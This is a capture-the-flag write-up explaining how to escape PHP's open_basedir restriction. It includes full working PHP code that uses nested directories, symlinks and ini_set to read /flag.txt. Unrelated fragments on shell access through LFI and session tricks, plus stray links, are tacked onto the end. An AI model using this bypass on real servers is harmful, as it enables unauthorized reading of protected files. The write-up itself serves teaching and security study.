This challenge was about bypassing PHP open_basedir when having a restricted arbitrary PHP code execution. Most of commons functions to execute commands were blocked.

The initial solution that was intended used the following facts :

• open_basedir can be tampered at runtime with ini_set, but is restricted by open_basedir itself (in other words, we should only be able to harden the existing rule)
• open_basedir on symlink is working
• call ini_set for open_basedir checks are only done at the time of changing the rule; the file system can change then

That means that we can point open_basedir to a regular file under /tmp/, and then switch it to a symlink pointing to ../../../../[...] - but to create such a symlink, we need to create an arborescence that allows do to so without breaching the rule :

chdir('/tmp');
$x='';
for($i=0;$i<10;$i++){
mkdir('z');
chdir('z');
$x.='../';
}
symlink($x,'x');
symlink($x,'y');
ini_set('open_basedir','x:y:/tmp/x');
rename('x',$x.'/x');
chdir('y');
chdir('x');
ini_set('open_basedir','/:/tmp/z');
echo file_get_contents('/flag.txt');

Congratz to every solvers!
Blaklis

" OK, by chaining above techniques(session upload progress + race condition + PHP wrappers), we can get the shell back!"

https://blog.semmle.com/ghostscript-CVE-2018-19475/
https://seclists.org/oss-sec/2016/q4/29

RCE through LFI using PHP sessions variables